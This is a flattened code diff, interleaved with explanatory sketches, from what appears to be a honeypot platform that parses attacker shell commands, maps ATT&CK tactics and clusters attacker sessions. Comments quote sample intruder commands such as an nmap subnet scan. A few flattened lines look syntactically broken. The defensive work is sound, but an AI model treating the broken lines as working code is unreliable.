-def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def]
+def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
Treats one ``SyntheticAttacker`` as one identity — adequate for

@@ -105,11 +105,11 @@ async def run_campaign_clusterer_loop(
t.cancel()
if heartbeat_task is not None:
heartbeat_task.cancel()
-for t in (*wake_tasks, heartbeat_task):
-if t is None:
+for task in (*wake_tasks, heartbeat_task):
+if task is None:
continue
with contextlib.suppress(asyncio.CancelledError, Exception):
-await t
+await task
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()

@@ -363,8 +363,9 @@ async def _roll_up_fingerprints(
breaks the clusterer tick — the columns just stay stale until the
next pass."""
summaries = extract_fp_summaries(member_rows)
+fp_kwargs = {k: v for k, v in summaries.items() if k in {"ja3_hashes", "hassh_hashes", "tls_cert_sha256"}}
try:
-await repo.update_identity_fingerprints(identity_uuid, **summaries)
+await repo.update_identity_fingerprints(identity_uuid, **fp_kwargs)
except Exception: # noqa: BLE001
log.exception(
"clusterer: failed to roll up fingerprints for identity=%s",

@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
-def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def]
+def from_synthetic(att) -> Observation:
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
Lives here so test code doesn't import the factory shape into the

@@ -15,6 +15,7 @@ emits no events for unobservable phases.
from __future__ import annotations
from enum import Enum
from typing import Final
class UKCPhase(str, Enum):
@@ -106,3 +107,96 @@ def stage_of(phase: UKCPhase) -> str:
if phase in STAGE_THROUGH:
return "through"
return "out"
# MITRE ATT&CK tactic ID -> UKC phase. Covers the 14 enterprise tactics
# plus the four ICS tactics referenced by Appendix A.7 (Conpot, MQTT).
# Adding additional ICS tactics is a one-line addition. See
# TTP_TAGGING.md "UKC bridge".
ATTACK_TACTIC_TO_UKC: dict[str, UKCPhase] = {
# Enterprise
"TA0043": UKCPhase.RECONNAISSANCE, # Reconnaissance
"TA0042": UKCPhase.RESOURCE_DEVELOPMENT, # Resource Development
"TA0001": UKCPhase.DELIVERY, # Initial Access
"TA0002": UKCPhase.EXECUTION, # Execution
"TA0003": UKCPhase.PERSISTENCE, # Persistence
"TA0004": UKCPhase.PRIVILEGE_ESCALATION, # Privilege Escalation
"TA0005": UKCPhase.DEFENSE_EVASION, # Defense Evasion
"TA0006": UKCPhase.CREDENTIAL_ACCESS, # Credential Access
"TA0007": UKCPhase.DISCOVERY, # Discovery
"TA0008": UKCPhase.LATERAL_MOVEMENT, # Lateral Movement
"TA0009": UKCPhase.COLLECTION, # Collection
"TA0011": UKCPhase.COMMAND_AND_CONTROL, # Command and Control
"TA0010": UKCPhase.EXFILTRATION, # Exfiltration
"TA0040": UKCPhase.IMPACT, # Impact
# ICS — first-class projection so MQTT / Conpot / Modbus tags
# don't drop out of campaign rollups when the clusterer projects
# tactic to phase. ICS uses an independent tactic-ID range.
"TA0100": UKCPhase.COLLECTION, # ICS: Collection
"TA0102": UKCPhase.DISCOVERY, # ICS: Discovery
"TA0105": UKCPhase.IMPACT, # ICS: Impact
"TA0106": UKCPhase.IMPACT, # ICS: Impair Process Control
}
# ICS tactics live in a separate STIX bundle (mitre/ics-attack) that
# DECNET does not currently load. They're exempt from the
# enterprise-bundle validation in :func:`validate_against_attack_bundle`
# so a startup check doesn't false-fail the moment ICS rules are wired.
_NON_ENTERPRISE_TACTICS: Final[frozenset[str]] = frozenset(
{"TA0100", "TA0102", "TA0105", "TA0106"}
)
def validate_against_attack_bundle() -> None:
"""Assert every enterprise tactic ID in :data:`ATTACK_TACTIC_TO_UKC` resolves in the loaded STIX bundle.
Called at startup (see :mod:`decnet.ttp.impl.rule_engine`) so a
typoed tactic ID surfaces as a fail-closed boot, not a silent
miss in campaign rollups.
"""
from decnet.ttp.attack_stix import assert_known_tactic_ids
assert_known_tactic_ids(
list(ATTACK_TACTIC_TO_UKC.keys()),
source="decnet.clustering.ukc.ATTACK_TACTIC_TO_UKC",
exempt=set(_NON_ENTERPRISE_TACTICS),
)
def tactic_to_ukc_phase(tactic: str) -> UKCPhase | None:
"""Map an ATT&CK tactic ID (e.g. ``"TA0001"``) to a :class:`UKCPhase`.
Returns ``None`` for unknown tactics. The map is closed-over the
enterprise + ICS tactics referenced by the rule pack; a tactic
outside that set is a contributor bug, not a runtime miss.
"""
return ATTACK_TACTIC_TO_UKC.get(tactic)
# Inverse map, built once at import time. Some tactics collide on the
# same phase (e.g. both TA0009 and TA0100 map to COLLECTION); the
# enterprise tactic wins because it is listed first in
# ATTACK_TACTIC_TO_UKC. A dict comprehension keeps the LAST write
# per key, so we iterate in reverse to keep the FIRST occurrence
# per phase. Pre-target phases (RECONNAISSANCE,
# RESOURCE_DEVELOPMENT, WEAPONIZATION, SOCIAL_ENGINEERING) that are
# not in OBSERVABLE_PHASES are deliberately lossy on the inverse:
# TTP tags must never assign them, so projecting back to a tactic
# is undefined. See TTP_TAGGING.md §UKC bridge.
_UKC_TO_TACTIC: dict[UKCPhase, str] = {
phase: tactic
for tactic, phase in reversed(list(ATTACK_TACTIC_TO_UKC.items()))
}
def ukc_phase_to_tactic(phase: UKCPhase) -> str | None:
"""Map a :class:`UKCPhase` back to an ATT&CK tactic ID.
Lossy on phases outside :data:`OBSERVABLE_PHASES` — pre-target
phases (e.g. ``RECONNAISSANCE``, ``WEAPONIZATION``) return
``None`` because no rule emits them, so the inverse is
undefined by design. The CDD test in E.2.9 pins which phases
are lossy.
"""
return _UKC_TO_TACTIC.get(phase)
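
The reversed-iteration trick used to build `_UKC_TO_TACTIC` is easy to misread, so here is a reduced sketch of it. The `Phase` enum and the four-entry `FORWARD` table are cut-down stand-ins for `UKCPhase` and `ATTACK_TACTIC_TO_UKC`, chosen only to show the collision case.

```python
from enum import Enum


class Phase(str, Enum):
    COLLECTION = "collection"
    IMPACT = "impact"


# Enterprise tactics are listed before their ICS counterparts.
FORWARD: dict[str, Phase] = {
    "TA0009": Phase.COLLECTION,  # enterprise
    "TA0040": Phase.IMPACT,      # enterprise
    "TA0100": Phase.COLLECTION,  # ICS, collides with TA0009
    "TA0105": Phase.IMPACT,      # ICS, collides with TA0040
}

# A dict comprehension is last-write-wins per key.
naive_inverse = {phase: tactic for tactic, phase in FORWARD.items()}

# Walking the items in reverse makes the FIRST forward entry the last write.
first_wins_inverse = {
    phase: tactic for tactic, phase in reversed(list(FORWARD.items()))
}
```

With the naive comprehension the ICS IDs would shadow the enterprise ones; the reversed walk keeps `TA0009` and `TA0040`. This relies on `dict` preserving insertion order, which Python guarantees from 3.7 onward.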

@@ -115,11 +115,11 @@ async def run_clusterer_loop(
t.cancel()
if heartbeat_task is not None:
heartbeat_task.cancel()
-for t in (*wake_tasks, heartbeat_task):
-if t is None:
+for task in (*wake_tasks, heartbeat_task):
+if task is None:
continue
with contextlib.suppress(asyncio.CancelledError, Exception):
-await t
+await task
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()

@@ -18,6 +18,7 @@ from datetime import datetime
from pathlib import Path
from typing import Any, Callable, Optional
from decnet.artifacts.shards import find_shard_with_sid
from decnet.bus import topics as _topics
from decnet.bus.factory import get_bus
from decnet.bus.publish import (
@@ -75,6 +76,21 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
)
_RL_MAX_ENTRIES: int = 10_000
# APP-NAMEs we never want to see in the ingestion stream — native unix
# daemons that share a container with a DECNET service. Their logs are
# noise: sshd's "Failed password for root from X" duplicates the
# auth-helper's structured `auth_attempt` event, pam_unix repeats it
# again, and CRON/systemd/etc. say nothing about attacker behavior.
# Override with DECNET_COLLECTOR_DROP_APPS (comma list). The value
# replaces the default list, so repeat the defaults to extend it.
_DROP_APPS: frozenset[str] = frozenset(
a.strip()
for a in os.environ.get(
"DECNET_COLLECTOR_DROP_APPS",
"sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
).split(",")
if a.strip()
)
_rl_lock: threading.Lock = threading.Lock()
_rl_last: dict[tuple[str, str, str, str], float] = {}
@@ -82,10 +98,11 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
def _should_ingest(parsed: dict[str, Any]) -> bool:
"""
Return True if this parsed event should be written to the JSON ingestion
-stream. Rate-limited connection-lifecycle events return False when another
-event with the same (attacker_ip, decky, service, event_type) was emitted
-inside the dedup window.
+stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
+rate-limits connection-lifecycle events within a dedup window.
""" """
if parsed.get("service", "") in _DROP_APPS:
return False
event_type = parsed.get("event_type", "")
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
return True
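
The drop list above is parsed once at import time from a comma-separated environment variable. The sketch below isolates that parsing so the edge cases are visible. `parse_drop_apps` and `should_ingest` are illustrative names, not functions from the collector.

```python
from typing import Any

DEFAULT_DROP_APPS = "sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon"


def parse_drop_apps(raw: str) -> frozenset[str]:
    """Split a comma list, trimming whitespace and discarding empty items."""
    return frozenset(a.strip() for a in raw.split(",") if a.strip())


def should_ingest(parsed: dict[str, Any], drop_apps: frozenset[str]) -> bool:
    """Mirror of the first check in _should_ingest: drop by APP-NAME."""
    return parsed.get("service", "") not in drop_apps


defaults = parse_drop_apps(DEFAULT_DROP_APPS)
custom = parse_drop_apps(" sshd, ,auditd,")
nothing = parse_drop_apps("")
```

Two consequences follow from this shape: setting the variable to an empty string disables dropping entirely, and matching is case-sensitive, which is why the default lists both `CRON` and `cron`.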
@@ -116,6 +133,234 @@ def _reset_rate_limiter() -> None:
with _rl_lock:
_rl_last.clear()
# ─── Session aggregator (TTP `attacker.session.ended` producer) ──────────────
#
# The TTP worker subscribes to ``attacker.session.ended`` and turns each
# emitted command into a ``source_kind="command"`` :class:`TaggerEvent`
# (see ``decnet/ttp/worker._build_events``). No upstream worker was
# producing that topic — the rule pack therefore never fired on live
# traffic. The aggregator below indexes shell-command events
# per-attacker_ip and emits one ``attacker.session.ended`` envelope
# whenever the SSH ``sessrec`` worker publishes ``session_recorded``.
#
# Memory bound: each attacker_ip's command list is bounded by TTL
# eviction (default 3600 s). Override via ``DECNET_COLLECTOR_SESSION_AGG_TTL_SEC``.
_SESSION_AGG_TTL_SEC: float = _parse_float_env(
"DECNET_COLLECTOR_SESSION_AGG_TTL_SEC", 3600.0,
)
# Body of a bash PROMPT_COMMAND CMD line:
# ``CMD uid=0 user=root src=192.168.1.5 pwd=/root cmd=ls /var/www/html``
# Splits into the structured fields the inspector renders + the
# residual ``cmd=`` value (which may itself contain spaces — preserve
# everything after ``cmd=`` as one token, do NOT word-split).
_CMD_BODY_HEAD_KV_RE = re.compile(r'(\w+)=(\S+)')
def _parse_cmd_msg(msg: str) -> dict[str, str]:
"""Split a bash CMD msg body into ``{uid, user, src, pwd, command}``.
Returns the empty dict on a non-CMD msg. ``command`` carries the
full post-``cmd=`` rest, including any embedded whitespace —
tools like ``nmap -p- 192.168.1.0/24`` would otherwise lose
everything after the first space.
"""
if not msg.startswith("CMD "):
return {}
head, sep, cmd_rest = msg[4:].partition("cmd=")
out: dict[str, str] = {}
for k, v in _CMD_BODY_HEAD_KV_RE.findall(head):
out[k] = v
if sep:
out["command"] = cmd_rest
return out
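
A worked example of the `cmd=` split may help, since the behaviour hinges on `str.partition` cutting at the first occurrence. The copy below is renamed `parse_cmd_msg` and is meant only as a self-contained restatement for experimentation, not as a replacement for the function above.

```python
import re

_HEAD_KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_cmd_msg(msg: str) -> dict[str, str]:
    """Split 'CMD k=v ... cmd=<rest>' into key/value pairs plus 'command'."""
    if not msg.startswith("CMD "):
        return {}
    # Everything after the first 'cmd=' is the command, spaces included.
    head, sep, cmd_rest = msg[4:].partition("cmd=")
    out = dict(_HEAD_KV_RE.findall(head))
    if sep:
        out["command"] = cmd_rest
    return out


typical = parse_cmd_msg(
    "CMD uid=0 user=root src=192.168.1.5 pwd=/root cmd=nmap -p- 192.168.1.0/24"
)
# Edge case: a working directory that itself contains 'cmd=' splits early.
early_split = parse_cmd_msg("CMD uid=0 pwd=/opt/cmd=x cmd=ls")
```

The edge case is unlikely in practice, but because `partition` stops at the first `cmd=` anywhere in the body, a path containing that substring would shift the boundary. Anchoring on `" cmd="` with a leading space would be one possible tightening.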
def _parse_iso_ts(value: str) -> Optional[datetime]:
"""Best-effort ISO-8601 parse for parsed event timestamps.
The collector's parser stamps ``timestamp`` either as the original
ISO-8601 string (when ``datetime.fromisoformat`` failed) or as the
reformatted ``%Y-%m-%d %H:%M:%S`` string. Both round-trip through
``fromisoformat`` after a space→T swap. Returns None if neither
shape parses — the aggregator skips events it can't time-stamp.
"""
if not value:
return None
candidates = (value, value.replace(" ", "T"))
for cand in candidates:
try:
return datetime.fromisoformat(cand)
except ValueError:
continue
return None
class _SessionAggregator:
"""Per-attacker_ip command index that emits ``attacker.session.ended``.
Thread-safe — :meth:`add_event` is called from the per-container
stream threads. Internal state is protected by a single lock; the
publish fan-out happens inside the lock for simplicity (the
downstream publish_fn is the thread-safe marshaller from
:mod:`decnet.bus.publish`, which is non-blocking).
"""
def __init__(
self,
publish_fn: Callable[[str, dict[str, Any], str], None],
*,
ttl_sec: float = _SESSION_AGG_TTL_SEC,
) -> None:
self._publish = publish_fn
self._ttl = ttl_sec
self._lock = threading.Lock()
# attacker_ip → list of (timestamp, parsed_event) tuples.
# Stored as a list rather than a deque so the ``in_window``
# filter can index linearly; the per-attacker volume is
# bounded by the TTL and by typical session size (≤ a few
# hundred commands) so this stays cheap.
self._cmds: dict[str, list[tuple[datetime, dict[str, Any]]]] = {}
def add_event(self, parsed: dict[str, Any]) -> None:
"""Index a parsed event. Emits on ``session_recorded``."""
event_type = parsed.get("event_type", "")
attacker_ip = parsed.get("attacker_ip") or ""
if not attacker_ip or attacker_ip == "Unknown":
return
ts = _parse_iso_ts(str(parsed.get("timestamp", "")))
if ts is None:
return
with self._lock:
self._evict_expired(ts)
if event_type == "command":
self._cmds.setdefault(attacker_ip, []).append((ts, parsed))
return
if event_type == "session_recorded":
self._emit_session(parsed, attacker_ip, ts)
def _evict_expired(self, now: datetime) -> None:
"""Drop commands older than ``self._ttl`` seconds."""
cutoff = now.timestamp() - self._ttl
for ip, entries in list(self._cmds.items()):
kept = [(t, p) for t, p in entries if t.timestamp() >= cutoff]
if kept:
self._cmds[ip] = kept
else:
del self._cmds[ip]
def _emit_session(
self, parsed: dict[str, Any], attacker_ip: str, ended_at: datetime,
) -> None:
"""Build an ``attacker.session.ended`` envelope and publish it.
Slices the per-IP command list to commands whose timestamp is at
or after ``ended_at - duration_s``. Commands stay in the list after
the slice; TTL eviction is the only path that drops them, so two
back-to-back sessions for the same IP share the visible window
without losing rows.
"""
fields = parsed.get("fields", {}) or {}
duration_raw = fields.get("duration_s") or "0"
try:
duration_s = float(duration_raw)
except (TypeError, ValueError):
duration_s = 0.0
sid = str(fields.get("sid") or "")
service = str(fields.get("service") or parsed.get("service") or "")
decky = parsed.get("decky") or ""
commands_window = self._cmds.get(attacker_ip, [])
cutoff_lo = ended_at.timestamp() - max(duration_s, 0.0)
commands: list[dict[str, Any]] = []
for idx, (cmd_ts, cmd_parsed) in enumerate(commands_window):
if cmd_ts.timestamp() < cutoff_lo:
continue
cmd_fields = cmd_parsed.get("fields", {}) or {}
# Pull structured uid/user/src/pwd/command from the bash
# msg body. The inspector renders these as separate
# key/value rows, which is much friendlier than dumping
# the raw ``CMD uid=0 user=... cmd=...`` string into a
# single ``command_text`` blob.
parsed_kv = _parse_cmd_msg(str(cmd_parsed.get("msg", "")))
cmd_text = (
cmd_fields.get("command")
or cmd_fields.get("cmd")
or parsed_kv.get("command")
or cmd_parsed.get("msg", "")
)
entry: dict[str, Any] = {
"id": f"{sid}#{idx}" if sid else f"{attacker_ip}-{cmd_ts.isoformat()}",
"command_text": str(cmd_text),
"ts": cmd_ts.isoformat(),
"decky": cmd_parsed.get("decky", ""),
"service": cmd_parsed.get("service", ""),
}
for key in ("uid", "user", "src", "pwd"):
value = parsed_kv.get(key) or cmd_fields.get(key)
if value is not None:
entry[key] = value
commands.append(entry)
# Resolve the asciinema shard so consumers (notably the BEHAVE-SHELL
# session-ended handler in the profiler worker) don't each have to
# disk-reach independently. Shard fields can be malformed or the
# transcripts dir may not exist yet — find_shard_with_sid returns
# None in those cases and we publish ``shard_path: None`` so the
# consumer skips honestly. Additive field; existing TTP consumers
# ignore it.
shard_path: str | None = None
resolve_error: str | None = None
if sid and decky and service:
try:
resolved = find_shard_with_sid(decky, service, sid)
except (ValueError, OSError, PermissionError) as exc:
resolve_error = f"{type(exc).__name__}: {exc}"
resolved = None
if resolved is not None:
shard_path = str(resolved)
if shard_path is None and sid:
# Loud-by-default — the BEHAVE-SHELL handler will skip
# session.ended events with shard_path=None, so a silent
# miss here means the profiler panel never hydrates. Surface
# the most common failure modes inline so the operator can
# diagnose without grepping decnet/artifacts/shards.py.
#
# 1. ARTIFACTS_ROOT not readable by the collector's user
# (perm 0750 decnet:decnet vs. User=anti without
# SupplementaryGroups=decnet).
# 2. service whitelist (_SERVICE_RE accepts ssh|telnet only).
# 3. sessrec hasn't flushed the shard for this sid yet
# (collector tick won the race; next tick recovers).
logger.warning(
"collector: shard_path=None decky=%s service=%s sid=%s "
"(error=%s) — profiler will skip this session.ended; "
"check ARTIFACTS_ROOT perms / service whitelist",
decky, service, sid, resolve_error or "shard not found",
)
payload: dict[str, Any] = {
"session_id": sid or None,
"attacker_uuid": None, # consumer resolves via repo
"attacker_ip": attacker_ip,
"decky_id": decky,
"service": service,
"ended_at": ended_at.isoformat(),
"duration_s": duration_s,
"commands": commands,
"shard_path": shard_path,
}
topic = _topics.attacker(_topics.ATTACKER_SESSION_ENDED)
try:
self._publish(topic, payload, _topics.ATTACKER_SESSION_ENDED)
except Exception as exc: # noqa: BLE001
logger.debug(
"collector: session.ended publish failed: %s", exc,
)
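
The aggregator combines two time filters: TTL eviction on every event, and a per-session lower bound when `session_recorded` arrives. The following sketch pulls both out as pure functions so the arithmetic can be checked without threads or a bus. The function names are illustrative, and the timestamps are timezone-aware to keep `.timestamp()` unambiguous.

```python
from datetime import datetime, timedelta, timezone

Entry = tuple[datetime, str]


def evict_expired(entries: list[Entry], now: datetime, ttl_sec: float) -> list[Entry]:
    """Keep only entries no older than ttl_sec relative to now."""
    cutoff = now.timestamp() - ttl_sec
    return [(ts, cmd) for ts, cmd in entries if ts.timestamp() >= cutoff]


def commands_in_session(entries: list[Entry], ended_at: datetime,
                        duration_s: float) -> list[str]:
    """Commands at or after ended_at - duration_s (negative durations clamp to 0)."""
    lower = ended_at.timestamp() - max(duration_s, 0.0)
    return [cmd for ts, cmd in entries if ts.timestamp() >= lower]


end = datetime(2026, 5, 16, 12, 0, 0, tzinfo=timezone.utc)
entries: list[Entry] = [
    (end - timedelta(seconds=120), "whoami"),
    (end - timedelta(seconds=30), "ls /var/www/html"),
    (end - timedelta(seconds=5), "id"),
]
in_session = commands_in_session(entries, end, 60.0)
after_ttl = evict_expired(entries, end, 60.0)
```

Only a lower bound is applied, as in `_emit_session`, so a command stamped later than `ended_at` would still be included. A missing or zero `duration_s` collapses the window to the end instant and usually yields an empty command list.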
# ─── RFC 5424 parser ──────────────────────────────────────────────────────────
_RFC5424_RE = re.compile(
@@ -129,6 +374,27 @@ _RFC5424_RE = re.compile(
r"(\S+) " # 4: MSGID (event_type)
r"(.+)$", # 5: SD element + optional MSG
)
# Honeypot SSH containers export a ``PROMPT_COMMAND`` that calls
# ``logger --rfc5424 --msgid command -p user.info -t bash "CMD …"``.
# That inner RFC 5424 line lands on the container's stdout, where the
# Docker stream reader prepends ANOTHER RFC 5424 envelope (PRI=14,
# HOSTNAME=<decky>, APP-NAME=1, MSGID=NIL). The outer parse therefore
# sees ``event_type == "-"`` while the real MSGID (``command``) is
# inside the body. We detect that case and re-extract the inner
# ``HOSTNAME APP-NAME PROCID MSGID rest`` so downstream consumers see
# ``event_type == "command"`` plus the real source hostname.
#
# Anchored on an ISO-8601 timestamp at the head of the body so we
# don't false-match free-form prose like "Connection from 1.2.3.4".
_INNER_RFC5424_RE = re.compile(
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
r"(\S+)\s+" # 2: inner HOSTNAME
r"(\S+)\s+" # 3: inner APP-NAME
r"\S+\s+" # PROCID (NIL or PID)
r"(\S+)\s+" # 4: inner MSGID
r"(.+)$", # 5: inner SD/MSG remainder
)
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
_PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')
_IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip")
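
To make the double-wrap detection concrete, the sketch below applies the same inner pattern to a sample body. The `unwrap` helper and the sample line are assumptions made up for illustration; the exact text the Docker stream reader produces is not shown in this diff.

```python
import re
from typing import Optional

INNER_RFC5424_RE = re.compile(
    r"^(\d{4}-\d{2}-\d{2}T\S+)\s+"  # 1: inner TIMESTAMP
    r"(\S+)\s+"                      # 2: inner HOSTNAME
    r"(\S+)\s+"                      # 3: inner APP-NAME
    r"\S+\s+"                        # PROCID (NIL or PID)
    r"(\S+)\s+"                      # 4: inner MSGID
    r"(.+)$"                         # 5: inner SD/MSG remainder
)


def unwrap(event_type: str, sd_rest: str) -> Optional[tuple[str, str, str, str]]:
    """Return (hostname, app, msgid, rest) for a double-wrapped body, else None."""
    if event_type != "-" or not sd_rest.startswith("-"):
        return None
    match = INNER_RFC5424_RE.match(sd_rest[1:].lstrip())
    if match is None:
        return None
    _ts, host, app, msgid, rest = match.groups()
    return host, app, msgid, rest


# Hypothetical body: outer SD is NIL ("-"), inner line follows.
wrapped = unwrap(
    "-",
    '- 2026-05-16T18:36:26+00:00 decky-01 bash - command '
    '[timeQuality tzKnown="1"] CMD uid=0 cmd=ls /tmp',
)
prose = unwrap("-", "- Connection from 1.2.3.4")
```

Anchoring on a leading ISO-8601 date is what keeps free-form messages from being reinterpreted as headers. The cost is that an inner line with a non-ISO timestamp would pass through unwrapped.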
@@ -168,8 +434,23 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
ts_raw, decky, service, event_type, sd_rest = m.groups()
fields: dict[str, str] = {}
msg: str = ""
# Honeypot SSH PROMPT_COMMAND lines are double-wrapped (Docker
# stdout envelope around the inner ``logger --msgid command`` line).
# Outer MSGID is NIL; the real MSGID is inside the body. Detect
# the inner shape and re-extract HOSTNAME / APP-NAME / MSGID /
# remainder so downstream extraction sees the real header.
if event_type == "-" and sd_rest.startswith("-"):
body = sd_rest[1:].lstrip()
inner = _INNER_RFC5424_RE.match(body)
if inner is not None:
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
decky = i_host
service = i_app
event_type = i_msgid
sd_rest = i_rest
msg: str = ""
if sd_rest.startswith("-"):
msg = sd_rest[1:].lstrip()
elif sd_rest.startswith("["):
@@ -177,16 +458,28 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
if block:
for k, v in _PARAM_RE.findall(block.group(1)):
fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]")
-msg_match = re.search(r'\]\s+(.+)$', sd_rest)
-if msg_match:
-msg = msg_match.group(1).strip()
+# Always recover the post-SD message tail, even when the SD
+# block isn't ``relay@55555`` (e.g. the ``timeQuality`` block
+# syslog auto-emits on bash CMD lines). Without this the body
+# of unwrapped PROMPT_COMMAND lines stays empty and the
+# attacker_ip kv-fallback below has nothing to scan.
+msg_match = re.search(r'\]\s+(.+)$', sd_rest)
+if msg_match:
+msg = msg_match.group(1).strip()
else:
msg = sd_rest
attacker_ip = "Unknown"
for fname in _IP_FIELDS:
if fname in fields:
-attacker_ip = fields[fname]
+raw = fields[fname]
+# remote_addr may be "host:port" — split so identity keys on IP only.
+host, _, port = raw.rpartition(":")
+if host and port.isdigit():
+attacker_ip = host.strip("[]") # handle [::1]:port IPv6 form
+fields.setdefault("remote_port", port)
+else:
+attacker_ip = raw
break
# Fallback for plain `logger` callers that don't use SD params (notably
@@ -220,6 +513,12 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
except ValueError:
ts_formatted = ts_raw
# Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
# "CMD ") get event_type rewritten to "command". `fields` stays empty
# so the frontend's msg-based pill rendering doesn't double up.
if event_type == "-" and msg.startswith("CMD "):
event_type = "command"
return {
"timestamp": ts_formatted,
"decky": decky,
@@ -346,7 +645,7 @@ def _stream_container(
publish_fn: CollectorPublishFn | None = None,
) -> None:
"""Stream logs from one container and append to the host log files."""
-import docker # type: ignore[import]
+import docker
lf: Optional[Any] = None
jf: Optional[Any] = None
@@ -416,12 +715,17 @@ def _make_system_log_publisher(
thread can call it unconditionally. Otherwise each call is marshalled
onto *loop* (the asyncio event loop that owns the bus socket) via
``make_thread_safe_publisher``.
The same call also feeds a :class:`_SessionAggregator` so shell
commands are indexed per-attacker_ip and ``attacker.session.ended``
fires whenever the SSH ``sessrec`` worker logs ``session_recorded``.
""" """
raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None
if raw_publish is None:
return lambda _parsed: None
topic = _topics.system(_topics.SYSTEM_LOG)
aggregator = _SessionAggregator(raw_publish)
def _publish(parsed: dict[str, Any]) -> None:
event_type = parsed.get("event_type", "")
@@ -436,6 +740,7 @@ def _make_system_log_publisher(
},
event_type,
)
aggregator.add_event(parsed)
return _publish
@@ -450,7 +755,7 @@ async def log_collector_worker(log_file: str) -> None:
Watches Docker events to pick up containers started after initial scan.
"""
-import docker # type: ignore[import]
+import docker
log_path = Path(log_file)
json_path = log_path.with_suffix(".json")
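
The `host:port` split added to `parse_rfc5424` uses `rpartition(":")` plus a digit check. One input it does not distinguish is a bare, unbracketed IPv6 address whose last group is all decimal digits (for example `2001:db8::1`), where the final group would be read as a port. The variant below is a sketch of one way to guard against that; `split_host_port` is a hypothetical helper and not part of the collector.

```python
from typing import Optional


def split_host_port(raw: str) -> tuple[str, Optional[str]]:
    """Split 'host:port' or '[v6]:port'; leave anything else untouched."""
    host, _, port = raw.rpartition(":")
    if not host or not port.isdigit():
        return raw, None              # no colon, or tail is not a port
    if host.startswith("[") and host.endswith("]"):
        return host[1:-1], port       # bracketed IPv6 with a port
    if ":" in host:
        return raw, None              # bare IPv6: the tail is an address group
    return host, port                 # IPv4 or hostname with a port


ipv4 = split_host_port("203.0.113.7:51514")
bracketed = split_host_port("[::1]:22")
bare_v6 = split_host_port("2001:db8::1")
plain = split_host_port("203.0.113.7")
```

Requiring brackets before treating a colon-bearing host as IPv6 with a port follows the usual URI convention, so well-formed `remote_addr` values are unaffected by the extra check.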

@@ -39,6 +39,7 @@ Shape::
master-host = 10.0.0.1 # required on agents
syslog-port = 6514
swarmctl-port = 8770
swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl`
[logging]
system-log = /var/log/decnet/decnet.system.log
@@ -120,6 +121,7 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
"master-host": "DECNET_SWARM_MASTER_HOST",
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
"swarmctl-port": "DECNET_SWARMCTL_PORT",
"swarmctl-host": "DECNET_SWARMCTL_HOST",
},
"logging": {
"system-log": "DECNET_SYSTEM_LOGS",


@@ -0,0 +1,21 @@
"""DECNET attribution engine — v0 aggregation library.
Pure library: per-(identity, primitive) state machine over BEHAVE-SHELL
observations. No I/O, no bus, no DB. The bus subscriber and DB writes
live in :mod:`decnet.correlation.attribution_worker` so this package
stays trivially testable with synthetic observation lists.
See ``development/ATTRIBUTION-ENGINE.md`` for the full design and the
explicit bright line: this engine does NOT do persona classification
(HUMAN/LLM/SCRIPTED), does NOT gate access, does NOT attribute to
named persons. It surfaces *behavioural coherence* and *behavioural
drift*, and stops there.
"""
from __future__ import annotations
from decnet.correlation.attribution.aggregate import (
AttributionState,
aggregate_observations,
)
__all__ = ["AttributionState", "aggregate_observations"]


@@ -0,0 +1,62 @@
"""Calibration thresholds for the attribution engine — every magic
number lives here, named, with the calibration source cited.
v0 values are heuristic. Real calibration ships when red-team
exercises produce labelled trace data
(``ATTRIBUTION-ENGINE.md`` §"Out of scope"). Until then these constants
are the engine's only knobs; aggregate.py never embeds a literal.
"""
from __future__ import annotations
# ── Categorical merger ────────────────────────────────────────────────
# Last-N window size for the categorical state machine. 5 calibrates
# against typical session counts (most attackers are observed < 10
# times before they go quiet — ATTRIBUTION-ENGINE.md §"Open question
# 2"). Operators with long-running attackers will want a wider window
# in v1.
CATEGORICAL_WINDOW_N = 5
# Minimum observations before the merger emits anything other than
# ``unknown``. Below this floor the state machine has no signal.
MIN_OBSERVATIONS_FOR_STATE = 3
# Categorical merger is one-outlier-tolerant: in a window of N=5, the
# state is ``stable`` if at least ``MAJORITY_THRESHOLD`` agree.
CATEGORICAL_MAJORITY_THRESHOLD = 4
# ── Numeric merger ────────────────────────────────────────────────────
# EWMA smoothing factor for numeric primitives. 0.3 weights recent
# observations enough to surface drift quickly without flapping on
# single outliers.
NUMERIC_EWMA_ALPHA = 0.3
# Coefficient-of-variation thresholds: dispersion / |mean|.
NUMERIC_STABLE_DISPERSION_PCT = 0.20 # < 20% of mean → stable
NUMERIC_DRIFT_MEAN_SHIFT_PCT = 0.30 # mean moved > 30% → drifting
NUMERIC_CONFLICT_DISPERSION_PCT = 1.0 # > 100% of mean → conflicted
